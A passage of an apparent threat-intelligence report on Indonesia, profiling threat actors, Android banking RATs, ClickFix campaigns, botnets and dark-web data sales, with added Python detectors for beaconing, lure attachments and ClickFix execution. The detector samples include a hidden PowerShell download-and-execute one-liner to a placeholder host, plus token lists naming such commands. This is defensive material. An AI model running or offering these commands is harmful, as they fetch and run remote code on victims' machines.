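            mean = statistics.mean(gaps)
            cv = statistics.pstdev(gaps) / mean if mean else 0.0
            if cv <= max_cv:
                reasons.append(f"periodic every ~{mean:.0f}s (cv={cv:.2f})")
        if reasons:
            findings.append((host, proc, dest, reasons))
    return findings

# Constructed sample: one implant-like process beaconing every five minutes, one browser
# session with irregular gaps, one short legitimate sync burst, one unrelated destination.
SAMPLE_LOG = """\
2026-03-14T09:00:00 ws-fin-07 svchost_updater.exe api.dropboxapi.com 612
2026-03-14T09:01:10 ws-hr-02 chrome.exe api.twitter.com 2048
2026-03-14T09:02:05 ws-hr-02 chrome.exe api.twitter.com 1733
2026-03-14T09:03:30 ws-ops-11 Dropbox.exe content.dropboxapi.com 90210
2026-03-14T09:03:31 ws-ops-11 Dropbox.exe content.dropboxapi.com 88211
2026-03-14T09:03:33 ws-ops-11 Dropbox.exe content.dropboxapi.com 91005
2026-03-14T09:05:00 ws-fin-07 svchost_updater.exe api.dropboxapi.com 598
2026-03-14T09:09:40 ws-hr-02 chrome.exe api.twitter.com 4096
2026-03-14T09:10:00 ws-fin-07 svchost_updater.exe api.dropboxapi.com 601
2026-03-14T09:12:15 ws-fin-07 chrome.exe intranet.example.invalid 10240
2026-03-14T09:15:00 ws-fin-07 svchost_updater.exe api.dropboxapi.com 644
2026-03-14T09:20:00 ws-fin-07 svchost_updater.exe api.dropboxapi.com 590
2026-03-14T09:31:00 ws-hr-02 chrome.exe api.twitter.com 3072
""".splitlines()

if __name__ == "__main__":
    for host, proc, dest, reasons in find_beacons(SAMPLE_LOG):
        print(f"{host} {proc} -> {dest}: {'; '.join(reasons)}")
```

The browser session to api.twitter.com has four hits but a coefficient of variation near 0.86, so it is not reported; the official Dropbox client's burst is both expected and too short to judge. Real implants add jitter, so max_cv is a tuning knob rather than a constant, and the process signal should be weighted more heavily where the telemetry carries it.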

SilverFox / Monarch / SwimSnake / The Great Thief of Valley / UTG-Q-1000 / Void Arachne – China-Linked Cybercrime
SilverFox, also tracked under aliases including Monarch, SwimSnake, The Great Thief of Valley, UTG-Q-1000, and Void Arachne, is a China based threat actor that has steadily evolved from delivering commodity remote access tools toward a more modular, multistage toolset blending public tooling with custom implants. During the reporting period, the group expanded a tax themed phishing operation that began against Indian organizations in December 2025, using fake notices, before pivoting to a near identical wave against Russian organizations in January 2026. Kaspersky’s subsequent investigation confirmed the operation had broadened further to include companies in Indonesia and South Africa, demonstrating the group’s willingness to exploit similar regulatory and compliance anxieties across multiple jurisdictions rather than treating any single country as a one-off target.

The operation’s core innovation was the pairing of a customized RustSL loader, pulled from a public GitHub repository and modified for evasion, with the well-known ValleyRAT backdoor and a previously undocumented Python based implant named ABCDoor. ABCDoor itself was not newly developed for this campaign. Kaspersky’s retrospective analysis traced its presence in the group’s arsenal back to at least December 2024, with real world deployment beginning in the first quarter of 2025, meaning the Indonesia and South Africa expansion represents a geographic broadening of an already mature toolset rather than the debut of new malware. More than 1,600 malicious emails were recorded across the tracked waves between early January and early February 2026 alone, hitting organizations primarily in industrial, consulting, retail, and transportation sectors.

Target Industries: Industrial manufacturing, consulting, retail, transportation, and trade sector organizations, with tax and finance themed lures aimed broadly at corporate back office and compliance functions.

Target Technologies: Windows enterprise environments, email gateways, clipboard data, screen content, pythonw.exe background processes used for stealthy execution.

Initial Access: Phishing emails disguised as official tax authority correspondence, typically warning of tax audits or violations, using either RAR archives with disguised executables or PDF attachments containing external download links to bypass email security gateways.

Key TTPs: Modified RustSL loader for initial execution and evasion, deployment of ValleyRAT for core command and control and plugin retrieval, delivery of the ABCDoor Python backdoor enabling near real time multi-screen streaming, clipboard access, DPAPI based file encryption, and self-updating, alongside a configurable victim country list that the operators have expanded over successive campaign waves.

Motivations: Financially motivated cybercrime built on credential theft, data exfiltration, and remote system control, with the group’s exploitation of trusted regulatory and tax authority branding indicating a deliberate strategy of maximizing victim compliance across whichever jurisdictions it chooses to target next.
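The two delivery formats listed under Initial Access above, archives holding executables with document-like names and PDFs whose only payload is an external download link, are both checkable at the mail gateway without detonating anything. The Python below is an added example, not from the report or from any gateway product: it flags archive members with an executable extension, a decoy document extension in front of it, or a right-to-left override character, and pulls external link targets and active actions out of a PDF's raw object syntax. The file names, the two sample PDFs and the extension lists are constructed; zip stands in for RAR because rarfile is not in the standard library, and the regular-expression PDF scan is a triage heuristic for unobfuscated lures, not a parser.

```python
"""Gateway-side triage of attachments: disguised executables in archives and
link-only lure PDFs. Added example; samples and extension lists are constructed."""
import io
import re
import zipfile

EXECUTABLE_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".hta", ".msi", ".lnk"}
DOCUMENT_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
RTLO = "\u202e"   # right-to-left override: visually reverses the tail of a file name

def classify_name(name):
    """Reasons a member name is suspicious; empty if it looks like an ordinary document."""
    reasons = []
    if RTLO in name:
        reasons.append("right-to-left override in name")
    parts = name.lower().replace("\\", "/").rsplit("/", 1)[-1].split(".")
    if len(parts) >= 2 and "." + parts[-1] in EXECUTABLE_EXT:
        reasons.append("executable extension ." + parts[-1])
        if len(parts) >= 3 and "." + parts[-2] in DOCUMENT_EXT:
            reasons.append("document extension used as decoy")
    return reasons

def scan_archive(data):
    """Map each suspicious archive member to its reasons."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            reasons = classify_name(info.filename)
            if reasons:
                hits[info.filename] = reasons
    return hits

_URI_RE = re.compile(rb"/URI\s*\(([^)]*)\)")
_ACTION_RE = re.compile(rb"/S\s*/(Launch|JavaScript|SubmitForm)\b")

def scan_pdf(data):
    """External link targets and active actions from a PDF's raw objects. Object streams
    or encoded content need a real parser first (pypdf is an assumption for that)."""
    links = [u.decode("latin-1") for u in _URI_RE.findall(data)]
    links = [u for u in links if re.match(r"https?://", u, re.I)]
    actions = sorted({m.decode() for m in _ACTION_RE.findall(data)})
    return {"external_links": links, "actions": actions,
            "needs_review": bool(links or actions)}

def build_sample_attachment():
    """Constructed archive: two disguised executables and one harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Tax_Audit_Notice_2026.pdf.exe", b"MZ placeholder, not a real binary")
        zf.writestr("Notice" + RTLO + "fdp.scr", b"MZ placeholder, not a real binary")
        zf.writestr("readme.txt", b"plain text")
    return buf.getvalue()

# Constructed minimal PDF: a single link annotation pointing at an external download.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj\n"
    b"4 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (http://example.invalid/taxform.rar) >> >> endobj\n"
    b"%%EOF\n"
)
# Constructed PDF with an open action that launches a program (placeholder target).
SAMPLE_PDF_LAUNCH = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /OpenAction << /S /Launch /F (placeholder) >> >> endobj\n"
    b"%%EOF\n"
)

if __name__ == "__main__":
    print(scan_archive(build_sample_attachment()))
    print(scan_pdf(SAMPLE_PDF))
    print(scan_pdf(SAMPLE_PDF_LAUNCH))
```

An external link on its own is not malicious, which is why the PDF result is a review flag rather than a verdict; the combination that characterises the lure described above is a link-only PDF arriving with tax-authority branding from an external sender.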

Mustang Panda / TA416 / RedDelta / BRONZE PRESIDENT – Chinese State-Linked
Mustang Panda is a long running Chinese state linked espionage group with a well-documented history of retooling its malware lineup while shifting geographic focus to match Beijing’s evolving intelligence priorities. In March 2026, researchers at Acronis identified a new variant of the group’s LOTUSLITE backdoor, attributing the activity to Mustang Panda with moderate confidence based on shared code lineage, persistence mechanisms, and residual build artifacts such as a carried over KugouMain export. The campaign marked a tactical shift in delivery tradecraft, moving from the CHM based delivery previously used in the group’s US government targeting toward JavaScript loaders and DLL sideloading, while simultaneously pivoting geographically away from prior US policy targets toward a new combination of financial sector and diplomatic targeting.

Every available source describing this specific LOTUSLITE campaign identifies its victims as Indian banking sector employees, lured with malicious CHM files disguised as support requests and fake HDFC Bank pop ups, alongside South Korean and US policy professionals targeted separately through spoofed Gmail accounts and Google Drive hosted documents. No source in the available reporting names Indonesian banking institutions or any Indonesian organization as a victim of this campaign. Given the close naming similarity between India and Indonesia, this entry should be treated as a likely misattribution rather than confirmed Indonesia targeting unless a separate, distinctly sourced incident can be identified.

Target Industries: Banking and financial services, foreign policy and diplomatic communities focused on Korean peninsula and Indo-Pacific affairs.

Target Technologies: Compiled HTML (CHM) files, JavaScript loaders, DLL sideloading using legitimate signed executables, dynamic DNS-based command-and-control infrastructure over HTTPS.

Initial Access: Malicious CHM files embedding a legitimate executable and a rogue DLL alongside a deceptive HTML prompt, which silently retrieves and executes JavaScript malware from a remote server before extracting and running the LOTUSLITE payload through DLL sideloading.

Key TTPs: Remote shell access, file operations, session management, incremental code maintenance and reuse across campaigns, and a demonstrated pattern of rapid geographic and sectoral pivoting using the same core implant.

Motivations: State-aligned espionage focused on financial intelligence and foreign policy monitoring rather than financial gain, consistent with Mustang Panda’s broader mandate of supporting Chinese strategic and geopolitical intelligence needs, though this specific campaign’s documented targeting does not currently extend to Indonesia.

MALWARE ACTIVITY IN INDONESIA

SURXRAT V5 Android RAT – Operated by Indonesian Threat Actor
SURXRAT V5 represented one of the most technically capable Android remote access trojans observed, operated by an Indonesia-based threat actor selling tiered access to global resellers. The malware demonstrated mature malware-as-a-service capabilities, intercepting one-time passwords, enabling unauthorized financial transactions, and incorporating experimental AI-assisted evasion mechanisms designed to bypass behavioral detection systems. Distribution was observed through localized Indonesian-language lures, including messaging application impersonation and fake application packages distributed through social media channels and unofficial APK repositories.

Target Technologies: Android mobile devices, mobile banking applications, OTP-based authentication systems, messaging platforms used for two-factor authentication delivery.

Initial Access: Sideloading through unofficial APK repositories, social engineering via WhatsApp and Telegram directing victims to download fraudulent applications, distribution through compromised social media accounts.

Key TTPs: OTP interception through SMS access permissions, real-time banking session monitoring through screen capture, unauthorized transaction initiation, AI-driven detection evasion through behavior randomization, exfiltration of device contacts and installed application lists for downstream targeting.

Coretax RAT
Beginning towards the end of 2025 and escalating sharply in early 2026, the Coretax RAT emerged as a significant threat to Indonesia’s mobile banking sector. Attackers used applications mimicking the official government tax platform DJP Online to deliver the RAT to Android devices. The malware exploited accessibility service permissions and disabled screen mirroring protections to enable remote banking session takeover. Several banks informally acknowledged that customers were compromised through this malware strain. Analysis confirmed that targeted applications had their security controls removed prior to repackaging, indicating a sophisticated preparation phase before distribution.

Target Technologies: Android mobile banking applications (particularly BRImo and peer applications from major Indonesian banks), government tax platform authentication flows, accessibility service frameworks.

Initial Access: Fraudulent APK files distributed through phishing websites, WhatsApp impersonation of tax officers directing victims to download fake Coretax applications, vishing calls impersonating DJP Online tax authority personnel.

Key TTPs: Accessibility service abuse to bypass banking application security controls, screen mirroring interception, credential exfiltration from banking sessions, remote transaction authorization, disabling of platform-level security protections prior to deployment.

MIMICRAT
MIMICRAT was distributed through advanced ClickFix campaigns utilizing compromised websites and Indonesian-language lures, Indonesian being one of seventeen localized languages the campaign supported during the reporting period. The malware functioned as a remote access trojan designed to bypass security controls by convincing users to execute commands themselves through fake verification prompts mimicking legitimate Cloudflare or browser security checks. Once executed, MIMICRAT enabled persistent remote access, token theft, and lateral movement within compromised environments.

Target Technologies: Windows enterprise environments, browser-based applications, authentication token stores, enterprise collaboration platforms.

Initial Access: ClickFix-style fake CAPTCHA pages on compromised legitimate websites, Indonesian-language social engineering prompts directing users to execute malicious PowerShell commands, malvertising through compromised advertising networks.

Key TTPs: User-executed payload delivery bypassing endpoint security controls, authentication token theft, persistent remote access maintenance, lateral movement using stolen credentials, data exfiltration from compromised enterprise environments.
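Because the ClickFix chain described above relies on the victim launching an interpreter from the Run dialog or a browser, the most reliable detection point is the process-creation event rather than the payload. The following is an added illustration (not code from the report or from any vendor) of a heuristic over Sysmon Event ID 1 style records; the field names, indicator list, and sample events are assumptions constructed for the example, and the domain is a placeholder.

```python
"""Heuristic detection of ClickFix-style command execution in process-creation logs.

Added example, not part of the CYFIRMA report. Flags the chain the report
describes for MIMICRAT: a user pastes a PowerShell one-liner from a fake
verification page into Win+R or a terminal. Field names follow Sysmon
Event ID 1 (ParentImage, Image, CommandLine); sample events are constructed.
"""
import base64
import re

# Parents that indicate a user-driven launch (Run dialog, browser) rather than
# a scheduler, service host or installer.
USER_LAUNCH_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Interpreters a ClickFix prompt typically asks the victim to run.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Download-and-execute and window-hiding tokens common in pasted one-liners.
SUSPICIOUS_TOKENS = [
    r"\biex\b", r"invoke-expression", r"\birm\b", r"invoke-restmethod",
    r"\biwr\b", r"invoke-webrequest", r"downloadstring", r"frombase64string",
    r"-w(?:indowstyle)?\s+hidden", r"-nop\b", r"-noprofile", r"-ep\s+bypass",
    r"executionpolicy\s+bypass", r"https?://",
]
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def clickfix_indicators(event: dict) -> list[str]:
    """Return the indicators matched by one process-creation event."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    if parent not in USER_LAUNCH_PARENTS or image not in INTERPRETERS:
        return []
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    # Apply the same token checks to the decoded payload so -enc does not hide it.
    text = (cmdline + " " + decoded).lower()
    hits = [tok for tok in SUSPICIOUS_TOKENS if re.search(tok, text)]
    if decoded:
        hits.append("encoded-command")
    return hits


def scan_events(events: list[dict], min_hits: int = 2) -> list[dict]:
    """Return events with at least min_hits indicators, annotated with the hits."""
    flagged = []
    for ev in events:
        hits = clickfix_indicators(ev)
        if len(hits) >= min_hits:
            flagged.append({**ev, "indicators": hits})
    return flagged


# Constructed sample events (assumed Sysmon Event ID 1 shape); placeholder domain.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENCODED = base64.b64encode(
    "iex (irm http://example.invalid/verify)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {   # Pasted from a fake verification page into Win+R: the ClickFix chain.
        "ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
        "CommandLine": 'powershell -w hidden -c "iex (irm http://example.invalid/verify)"'},
    {   # Same chain with the payload hidden behind -EncodedCommand.
        "ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
        "CommandLine": f"powershell -nop -enc {_ENCODED}"},
    {   # Administrator opening an interactive shell from the Start menu: benign.
        "ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
        "CommandLine": "powershell.exe"},
    {   # Scheduled maintenance script: not user-driven, so not in scope.
        "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": _PS,
        "CommandLine": "powershell -ep bypass -File C:\\Scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit["CommandLine"][:60], "->", hit["indicators"])
```

The parent-process gate keeps scheduled or service-launched PowerShell out of scope; tune `USER_LAUNCH_PARENTS` to the terminal and browser set in use.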

GigaBud.RAT and MMRat
Both GigaBud.RAT and MMRat were deployed by the GoldFactory threat cluster as part of the Coretax tax season fraud campaign. GigaBud.RAT specialized in screen recording and OTP interception, while MMRat enabled real-time device control and banking transaction manipulation. The combined deployment of these two tools within a single attack chain demonstrated GoldFactory’s mature, modular approach to mobile-banking fraud, with each tool contributing a specific capability to the overall intrusion lifecycle.

Target Technologies: Android mobile banking applications, real-time payment platforms, OTP-based authentication flows.

Initial Access: Delivered as malicious APK files through phishing infrastructure established to impersonate the Coretax web platform.

Key TTPs: Screen recording during active banking sessions, OTP interception and forwarding, real-time remote device control, unauthorized transaction initiation, device information exfiltration for fraud facilitation.

Infostealers (Lumma Stealer and AgentTesla)
Credential-stealer malware activity remained widespread across Indonesian financial and enterprise environments during the reporting period. Lumma Stealer reportedly infected more than 14,000 devices in Indonesia during the first half of 2025, with infections continuing into the December 2025 to May 2026 window. AgentTesla campaigns were primarily associated with business email compromise workflows impacting Indonesian financial services and logistics operations, where attackers leveraged mailbox access to manipulate payment processes and intercept financial communications.

Target Technologies: Windows browsers (Chrome, Edge, Firefox), email clients, cryptocurrency wallet applications, enterprise communication platforms, point-of-sale systems.

Initial Access: Spear-phishing with macro-enabled documents, malvertising through compromised advertising networks, trojanized software installers distributed through unofficial channels, drive-by downloads from compromised legitimate websites.

Key TTPs: Browser credential harvesting from saved passwords and autofill data, email credential extraction enabling business email compromise, cryptocurrency wallet targeting and private key theft, clipboard hijacking for transaction manipulation, keylogging for credential interception across enterprise applications.

POTENTIAL EMERGING THREATS TO INDONESIA

Agentic AI as an Offensive Weapon
There is a rapid acceleration in underground discussions around weaponizing generative AI tools for offensive cyber operations targeting Indonesian environments. Specific use cases being explored and operationalized by threat actors include AI-generated malware with adaptive evasion, hyper-personalized phishing lures crafted from Indonesian-language social media content and public data, and adversarial attacks on AI systems deployed by Indonesian financial institutions. AI-powered phishing success rates already reached 54 to 60 percent during the reporting period, with deepfake audio used in vishing campaigns to impersonate bank officers and government tax officials with high convincingness. As Indonesian enterprises rapidly adopt AI without mature governance frameworks, the risk of data leakage through prompt injection and AI system compromise is assessed as materially elevated heading into the second half of 2026.

Zero-Click Mobile Exploit Risk for High-Value Individuals
Indicators identified during the reporting period suggest a rising pattern of non-interactive mobile device compromise targeting politically sensitive individuals, executives, journalists, civil society leaders, and legal professionals operating in Indonesia. Evidence points to infiltration of smartphones without user interaction, with payloads functioning as persistent backdoors granting remote access to device data, communications, and location. Given Indonesia’s role as a significant democratic state with active civil society, independent media, and a complex political environment involving relations with China, the United States, and Australia, executives, legal professionals, journalists, and political figures face elevated and growing mobile surveillance risk from state-aligned actors.

Supply Chain Compromise Escalation
Supply chain compromise through trojanized software, firmware updates, and hardware implants has emerged as a critical escalating threat vector with direct impact on Indonesian organizations. Intelligence indicates increasing sophistication in supply chain targeting, particularly affecting telecommunications providers, government software vendors, and VPN and security appliance manufacturers serving the Asia-Pacific region. Lotus Blossom’s confirmed abuse of Notepad++ update mechanisms and PlushDaemon’s trojanized VPN installer supply chain vector demonstrate that this threat has moved from theoretical to operational within Indonesia’s geographic and technological neighborhood. Indonesian government procurement of network hardware and security appliances without formal supply chain assurance validation represents a structural vulnerability.

IoT and Smart Infrastructure Exploitation
Indonesia’s rapid digitalization includes extensive deployment of smart devices, building management systems, and IoT-enabled public infrastructure across urban centers including Jakarta, Surabaya, and Bandung. These deployments frequently operate outside structured patch management cycles, creating persistent soft targets for intrusion and lateral movement. Smart city infrastructure linked to critical services including transportation, utilities, and public safety represents a particularly high-consequence exposure surface. Malware incidents targeting smart devices in Indonesia showed significant year-over-year increases, with trojans disguised as legitimate applications remaining the dominant delivery mechanism.

Deepfake-as-a-Service Industrialization
Deepfake-as-a-service platforms democratized access to high-quality voice and video synthesis during the reporting period, with AI-powered deepfakes involved in over 30 percent of high-impact corporate impersonation attacks in the broader region during 2025. In Indonesia specifically, deepfake audio was weaponized in vishing campaigns impersonating tax officers and bank officials as part of the Coretax fraud campaign. Deepfake technology was also documented in broader disinformation operations targeting Indonesian political figures and public institutions. The combination of Indonesia’s large internet-connected population, active social media ecosystem, and limited deepfake detection awareness creates conditions for rapid escalation of deepfake-enabled fraud at scale.

Cryptocurrency and Digital Asset Infrastructure Targeting
Following the Indodax breach in late 2024, Indonesian cryptocurrency infrastructure remained a sustained high-priority target for Lazarus Group and financially motivated actors during the reporting period. Indonesia’s growing retail cryptocurrency adoption, expanding DeFi participation, and development of digital payment infrastructure create an expanding target surface. The combination of relatively limited security maturity in domestic cryptocurrency platforms and the high financial returns available from successful intrusions positions Indonesian digital asset infrastructure as a persistent priority target for sophisticated financially motivated adversaries.

KEY EVENTS IN INDONESIA: ELEVATED CYBER RISK PERIODS

High-Risk Digital Economy and Financial Events

10DX Summit Indonesia (February 10, 2026, Jakarta): Bringing together banking and technology leadership to focus on digital infrastructure execution, scaling AI, and partnering with super-apps, this summit represented a concentrated environment of high-value targets among Indonesia’s banking and fintech sector. Credential harvesting, spear-phishing against attendees, and targeted social engineering operations against participating financial institutions were assessed as elevated risks around this event window. Attendee devices, event Wi-Fi infrastructure, and organizer communication channels warranted elevated threat posture during this period.

National Tax Season Window (January to March 2026): The Coretax fraud campaign’s deliberate timing to coincide with Indonesia’s national tax filing season demonstrated that threat actors actively monitor regulatory and seasonal calendars to maximize attack surface exploitation. The convergence of 67 million potential targets engaging with digital tax platforms created the conditions for industrialized fraud deployment at population scale. This window represents a recurring, predictable elevated risk period for Indonesian financial institutions, tax authorities, and citizens.

IndoSec 2026 (September 15 to 16, 2026, Jakarta Ritz-Carlton Pacific Place): Indonesia’s largest and most prestigious cybersecurity summit represents a concentrated environment of security leadership, critical infrastructure operators, and government officials. The public release of threat outlooks and vulnerability discussions at such events creates an intelligence windfall for adversaries that publicly documents identified weaknesses and sector-specific defensive gaps, with increased reconnaissance activity against highlighted targets anticipated in the weeks following the event.

Regulatory and Policy Milestones

Cybersecurity and Cyber Resilience Bill Harmonization Window: The Bill’s entry into inter-ministerial harmonization with the Ministry of Law beginning in May 2025, with enactment still pending as of the most recent regulatory tracking, has created an extended transition period representing a window of elevated risk. Organizations in early stages of compliance preparation presented softer security postures, and threat actors aware of the regulatory timeline may deliberately time operations to exploit the gap between legislative enforcement and operational security maturity across newly covered critical infrastructure operators.

Personal Data Protection Agency Operational Launch (Targeted 2026): The establishment of Indonesia’s dedicated PDP Agency represents a significant regulatory milestone with direct implications for how personal data breaches are investigated, reported, and enforced. The transition period as the agency assumes functions from the Directorate General of Digital Space Supervision creates temporary ambiguity in enforcement authority that sophisticated actors operating in Indonesia’s data ecosystem may seek to exploit before the agency reaches full operational capacity.

National Data Center Program Expansion: Indonesia’s EUR 164 million National Data Center program (Cikarang facility, Phase I), aimed at consolidating government digital infrastructure, represents both a security opportunity and a risk concentration point. The consolidation of government data into centralized infrastructure improves consistency of security controls but simultaneously creates a higher-consequence single target for ransomware operators and state-sponsored actors, consistent with the pattern observed in the 2024 Pusat Data Nasional ransomware incident that disrupted 282 government agencies.

Geopolitical Flashpoints Creating Elevated Hacktivist Risk

ASEAN Summit Cycle (2026): Indonesia’s sustained ASEAN engagement creates recurring windows of elevated hacktivist and state-sponsored activity. Political flashpoints related to South China Sea territorial dynamics, Indonesian foreign policy positioning, and regional security discussions have historically triggered spikes in hacktivist DDoS campaigns, website defacements, and targeted intrusion attempts against government and diplomatic infrastructure. Any escalation in regional tensions during 2026 would be expected to drive corresponding increases in cyber operational tempo against Indonesian government and military-adjacent targets.

BOTNET ACTIVITY IN INDONESIA

Indonesia remains one of the most botnet-affected countries in Southeast Asia, functioning both as a major source of compromised infrastructure and a frequent target of opportunistic botnet activity. As of early May 2026, Indonesia ranked 7th globally for botnet-related compromise activity, with approximately 68,000–85,000 active compromised IPs involving routers, DVRs, IP cameras, and Android-based IoT devices. Weak/default credentials, outdated firmware, and the widespread use of low-cost consumer IoT hardware continue to drive infections and large-scale malware propagation. During 2025 and early 2026, the Aisuru and Kimwolf Mirai-derived botnets infected an estimated 1–4 million devices globally, including significant infections in Indonesia, enabling massive DDoS attacks exceeding 200 million requests per second and reaching approximately 31.4 Tbps while also operating as DDoS-for-hire infrastructure through underground channels.

On 19 March 2026, international law enforcement disrupted the command-and-control infrastructure associated with Aisuru and Kimwolf; however, millions of vulnerable devices remained exposed to re-infection and successor malware campaigns. Following the takedown, new Mirai variants rapidly emerged, including Nexcorium, exploiting CVE-2024-3721 in TBK DVR devices, and Tuxnokill, targeting end-of-life D-Link routers via CVE-2025-29635. These botnets continue automated scanning, exploitation, and recruitment activity globally, including against Indonesian infrastructure. CYFIRMA assesses with moderate confidence that Indonesia will remain exposed to sustained IoT botnet and DDoS activity throughout 2026 due to the large population of vulnerable internet-exposed devices and persistent low security maturity across consumer IoT ecosystems.

GEOPOLITICAL CONTEXT AND INDONESIA’S THREAT ENVIRONMENT

Indonesia occupies a strategically important position at the intersection of the Indian and Pacific Oceans, serving as Southeast Asia’s largest economy and a pivotal member of ASEAN. The country’s threat landscape is shaped by its role as a major emerging market, its extensive natural resource base (particularly critical minerals including nickel, cobalt, and bauxite), its democratic governance structure, and its positioning within the intensifying strategic competition between China and the United States in the Indo-Pacific region.

Indonesia’s official posture of strategic autonomy, maintaining substantive relationships with both Washington and Beijing while resisting alignment with either power’s bloc, makes it a target for intelligence collection by both sides of the geopolitical divide. Chinese state-aligned actors seek intelligence on Indonesia’s foreign policy deliberations, ASEAN coordination positions, and bilateral negotiation postures. Western intelligence partners, while not discussed in the same adversarial framing, create their own pressures on Indonesia’s data sovereignty through the broad collection mandates of Five Eyes-aligned operations across the region.

Indonesia’s critical mineral wealth, particularly its nickel reserves, sits at the center of a geopolitical contest over supply chain control for battery technology and electric vehicle manufacturing. APT41 and other APT groups with Chinese strategic economic mandates maintained targeting of Indonesia’s mining and energy sectors throughout the reporting period, consistent with Beijing’s industrial policy interest in ensuring access to, or intelligence about, key resource supply chains. Indonesia’s policies on downstream processing requirements for nickel exports are directly relevant to Chinese industrial strategy, creating intelligence collection motivation that extends beyond traditional espionage into economic intelligence gathering.

The country’s democratic governance, active civil society, and independent media created an additional dimension of targeting. State-aligned actors from China and North Korea monitored civil society organizations, journalists, academic institutions, and think tanks engaged in analysis of regional security dynamics and human rights issues. Indonesia’s role in ASEAN consensus formation and its positions on issues including maritime territorial disputes and South China Sea navigation rights made it a target for intelligence collection by multiple state actors simultaneously.

Indonesia recorded 5.5 billion cyberattacks in 2025, a 714 percent increase against the prior four-year annual average. Presidential Chief of Staff Dudung Abdurachman confirmed in June 2026 that these attacks specifically targeted government infrastructure, the economy, and national security. The cybersecurity market, valued at $1.35 billion in 2025 and growing at a projected CAGR of over 20 percent through 2031, reflects growing institutional awareness of the threat environment. However, current security investment remains structurally insufficient relative to the scale of Indonesia’s digital economy and the persistence of the adversarial pressure it faces.

Indonesia’s rapid digitalization under the Making Indonesia 4.0 initiative, combined with the adoption of BI-FAST real-time payments, QRIS merchant codes, and the National Data Center program, has materially widened the attack surface while simultaneously creating high-consequence targets. The concentration of government digital services in centralized data infrastructure, demonstrated as a critical vulnerability in the 2024 Pusat Data Nasional ransomware incident, remains a structural risk as the National Data Center program expands.

Given Indonesia’s political importance as the world’s third-largest democracy and its strategic centrality in ASEAN, any escalation in regional tensions involving the South China Sea, Taiwan, or the broader US-China strategic competition would be expected to generate significant cyber and informational spillover effects against Indonesian government, military-adjacent, and critical infrastructure targets. Cyber operations offer state actors a means of collecting intelligence and applying pressure below the threshold of overt confrontation, consistent with the full-spectrum competition dynamics characterizing the contemporary Indo-Pacific security environment.

MAJOR DARK-WEB INCIDENTS

On May 28, 2026, a threat actor allegedly claimed to have targeted a political party based in Indonesia. The alleged breach sample contains 4 GB of data.

On May 27, 2026, a threat actor advertised the sale of data allegedly belonging to an Indonesian healthcare application on an underground Telegram channel. The threat actor claimed that the dataset contains information on approximately 192,000 users, including 105,000 unique email addresses, 121,000 unique phone numbers, 19,000 unique KTP numbers, and 45,000 unique insurance policy records. The exposed data reportedly includes IP addresses, policy numbers, bcrypt-hashed passwords, email addresses, phone numbers, dates of birth, full names, and additional personal information. The dataset was offered for sale at USD 200. The threat actor did not disclose the source of the data or how it was obtained.

On May 17, 2026, a post on an underground forum advertised an alleged data breach involving an Indonesian state-owned enterprise that manages fisheries, port operations, and aquaculture activities. The threat actor claimed that the dataset contains 252 records, including Indonesian national identity numbers (NIK), driver’s license numbers (SIM), passport numbers, family card numbers (KK), BPJS numbers, NPWP numbers, NISN numbers, NIM numbers, phone numbers, and email addresses. The source of the data and the method by which it was obtained were not disclosed.

On May 6, 2026, a post on an underground forum advertised an alleged data breach involving an official Indonesian government website. The threat actor claimed to possess a database containing 2,006 personnel records, with a reported data size of 31.78 MB. The dataset was reportedly provided in JSON format and includes information such as rank, full name, duty or position, phone number, email address, and other fields. The source of the data and the method by which it was obtained were not disclosed.

On April 30, 2026, a post on an underground forum advertised an alleged data breach involving an integrated data system operated by the Education and Culture Office of Indonesia. The platform is used to monitor and evaluate educational institutions, educators, education personnel, students, and educational facilities and infrastructure. The threat actor claimed to possess data associated with the platform; however, the volume of the data and the method by which it was obtained were not disclosed.

CONCLUSION

Indonesia’s threat environment has matured beyond opportunistic exploitation into a sustained, multi-actor campaign landscape where financially motivated and state-sponsored adversaries operate simultaneously, with increasing precision and local calibration. Threat actors demonstrated detailed awareness of Indonesia’s regulatory calendar, domestic policy decisions, tax season cycles, and procurement events, using this knowledge to time and craft intrusions for maximum impact and credibility.

Several structural conditions continue to favour adversaries. The gap between Indonesia’s rapid digital expansion and its security investment levels remains wide. Consumer IoT infrastructure is extensively compromised and quickly re-exploited following takedowns. The regulatory transition period creates enforcement ambiguity that sophisticated actors are positioned to exploit. And the sustained availability of Indonesian citizen and institutional data in underground markets provides persistent targeting infrastructure for downstream fraud and intrusion operations.

